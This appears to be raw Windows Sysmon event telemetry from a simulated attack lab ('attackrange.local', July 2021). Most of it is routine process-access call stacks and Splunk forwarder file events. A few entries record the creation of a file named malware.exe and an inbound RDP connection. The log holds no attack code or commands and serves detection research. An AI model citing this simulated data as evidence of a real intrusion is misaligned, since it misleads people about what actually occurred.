07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046379Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046378Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046377Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046376Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046375Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-02AF-60E8-0C00-00000000CF01}84410200C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046374Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.403{466BC892-32D3-60E8-700B-00000000CF01}166410132C:\Windows\System32\sihost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\SYSTEM32\usermgrcli.dll+1121|C:\Windows\System32\modernexecserver.dll+37dac|C:\Windows\System32\modernexecserver.dll+37d4f|C:\Windows\System32\modernexecserver.dll+375a6|C:\Windows\System32\modernexecserver.dll+1a1c4|C:\Windows\System32\modernexecserver.dll+3191d|C:\Windows\System32\modernexecserver.dll+32871|C:\Windows\System32\modernexecserver.dll+3278f|C:\Windows\SYSTEM32\ntdll.dll+2063e|C:\Windows\SYSTEM32\ntdll.dll+1e854|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001046373Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+78b1|C:\Windows\SYSTEM32\psmserviceexthost.dll+74d7|C:\Windows\SYSTEM32\psmserviceexthost.dll+12fce|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\S
ystem32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046372Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0677-60E8-BC03-00000000CF01}5972C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046371Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-0675-60E8-B703-00000000CF01}5772C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046370Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-32D6-60E8-840B-00000000CF01}7376C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000001046369Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
07:45:07.372{466BC892-02AF-60E8-0C00-00000000CF01}8449956C:\Windows\system32\svchost.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x3600C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\psmserviceexthost.dll+966a|C:\Windows\SYSTEM32\psmserviceexthost.dll+776e|C:\Windows\SYSTEM32\psmserviceexthost.dll+12f1c|C:\Windows\SYSTEM32\psmserviceexthost.dll+15b2b|C:\Windows\SYSTEM32\psmserviceexthost.dll+1011d|C:\Windows\SYSTEM32\psmserviceexthost.dll+104a0|C:\Windows\SYSTEM32\psmserviceexthost.dll+13952|C:\Windows\SYSTEM32\psmserviceexthost.dll+16139|C:\Windows\SYSTEM32\psmserviceexthost.dll+16c03|C:\Windows\SYSTEM32\resourcepolicyserver.dll+1a70e|C:\Windows\SYSTEM32\resourcepolicyserver.dll+14fc2|C:\Windows\SYSTEM32\resourcepolicyserver.dll+c61d|C:\Windows\SYSTEM32\resourcepolicyserver.dll+118d9|C:\Windows\SYSTEM32\resourcepolicyserver.dll+b91a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 23542300x80000000000000001046368Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:07.287{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C29336B42665E1812828449BD0979D3F,SHA256=542FD4C1872F07AC4BC31A4F4BD608191537862695CBA1495D7EBFB249A89F2D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046385Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:00.642{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program 
Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local50921-false10.0.1.12-8000- 23542300x80000000000000001046384Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:08.318{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55D7CA1200FC003969BE65994AA8D231,SHA256=C1383546989AC07ED4DC9D31A75A836CD3BFA81E2F2E08064FECCFF2D8336B0F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806225Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:06.355{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57166-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x80000000000000001046386Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:09.333{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6AF2A256E46592DFFB7CCA5A7631C0EB,SHA256=B7EA9060D211F55449D2F16B07FE2E2702CE91F4D87A31FBFE8ED34A669C13AE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806226Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:09.003{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7981E6BA38121A9C1E6E902575E58E77,SHA256=39162DA94E4F07B33616B36DB3E9EF0F1876E148D929B1B48DBA2B6E485ACB47,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001046388Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:02.893{466BC892-02AD-60E8-0B00-00000000CF01}624C:\Windows\System32\lsass.exeNT AUTHORITY\SYSTEMtcpfalsefalse10.0.1.15ip-10-0-1-15.eu-central-1.compute.internal57167-false10.0.1.14win-dc-890.attackrange.local49676- 23542300x80000000000000001046387Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:10.370{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=298DB3679A3B812BD96857325E8AE00C,SHA256=A6604A3ABD43926E16220E8B87C953E4A3EEE66A7C590E4BCABFDA9F200CDF4E,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000806230Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:08.890{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-46236-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x8000000000000000806229Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=70816EC04134BACD210F87C78F0C3F93,SHA256=FEF34BDDBCE61CE239ACB94E890490879BC9DFFA8D76F4B994A6857AE0154EA6,IMPHASH=00000000000000000000000000000000falsetrue 
23542300x8000000000000000806228Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.347{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=60F213CBCE119AC69B3470BE29E0C587,SHA256=6824BF9946B23ABEAC7534CC5F03A9F3956443CA35B4592C9AAD376231DC792D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806227Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:10.034{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71C8AF27DD74190DA8C31CE192FBA569,SHA256=D7B36D2BC54D3AE354D8C45A5570CB461E23B1B1F098ACA00BA705A23D860919,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001046390Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:11.684{466BC892-02AF-60E8-0D00-00000000CF01}900696C:\Windows\system32\svchost.exe{466BC892-02B0-60E8-1600-00000000CF01}1304C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+f681|c:\windows\system32\rpcss.dll+d34e|c:\windows\system32\rpcss.dll+b4d7|c:\windows\system32\rpcss.dll+8257|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001046389Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:11.384{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5CA13D544DB8629083473229D7527018,SHA256=5B8EC953DAC27111379006AA352A4232D2D19B575160E3299DDEE99870C7192A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806231Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:45:11.066{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=527A28A3877FCD926EDAECD1182151B1,SHA256=0E8642461327F68CED13D25BAC231A3B25D4FC2D1726DFF770BB57580103E59E,IMPHASH=00000000000000000000000000000000falsetrue 11241100x80000000000000001046397Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.localEXE2021-07-12 07:45:12.916{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXEC:\Temp\test\malware.exe2021-07-12 07:45:12.916 10341000x80000000000000001046396Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.870{466BC892-32D3-60E8-730B-00000000CF01}59843788C:\Windows\System32\taskhostw.exe{466BC892-32D3-60E8-770B-00000000CF01}6356C:\Windows\Explorer.EXE0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 11241100x80000000000000001046395Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:45:12.570{466BC892-3462-60E8-100C-00000000CF01}8944C:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\AlternateServices.txt2021-07-09 11:40:00.511 23542300x80000000000000001046394Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
